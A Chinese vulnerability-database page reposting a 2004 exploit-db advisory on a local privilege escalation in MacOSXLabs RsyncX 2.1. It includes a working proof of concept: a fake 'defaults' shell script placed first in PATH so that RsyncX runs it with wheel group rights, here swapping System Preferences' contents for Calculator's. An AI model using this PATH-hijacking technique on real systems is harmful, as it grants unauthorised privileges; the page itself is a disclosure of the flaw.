MacOSXLabs RsyncX 2.1 – Local Privilege Escalation

MacOSXLabs RsyncX 2.1 – Local Privilege Escalation

漏洞ID 1054630 漏洞类型
发布时间 2004-09-17 更新时间 2004-09-17
图片[1]-MacOSXLabs RsyncX 2.1 – Local Privilege Escalation-安全小百科CVE编号 N/A
图片[2]-MacOSXLabs RsyncX 2.1 – Local Privilege Escalation-安全小百科CNNVD-ID N/A
漏洞平台 OSX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24608
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11211/info

It is reported that RsyncX is prone to a local privilege escalation vulnerability.

RsyncX is installed setuid root and setgid wheel. It is reported that RsyncX drops root privileges properly but fails to drop setgid wheel privileges before executing a third party binary. 

A local attacker may exploit this vulnerability to execute arbitrary code with group wheel privileges.

The following example is available:

First, make a backup of System Preferences.app

Create an executable file ~/bin/defaults with contents of:

=============================
#!/bin/sh
mv "/Applications/System Preferences.app/Contents" "/Applications/System Preferences.app/oldcont"
cp -r "/Applications/Calculator.app/Contents" "/Applications/System Preferences.app/Contents"
=============================

Then run RsyncX with ~/bin in your path:

PATH=~/bin:$PATH /Applications/Utilities/RsyncX.app/Contents/MacOS/RsyncX

Click on System Preferences, and is now a calculator.

相关推荐: Macromedia ColdFusion MX Form Fields Denial of Service Vulnerability

Macromedia ColdFusion MX Form Fields Denial of Service Vulnerability 漏洞ID 1098943 漏洞类型 Failure to Handle Exceptional Conditions 发布…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享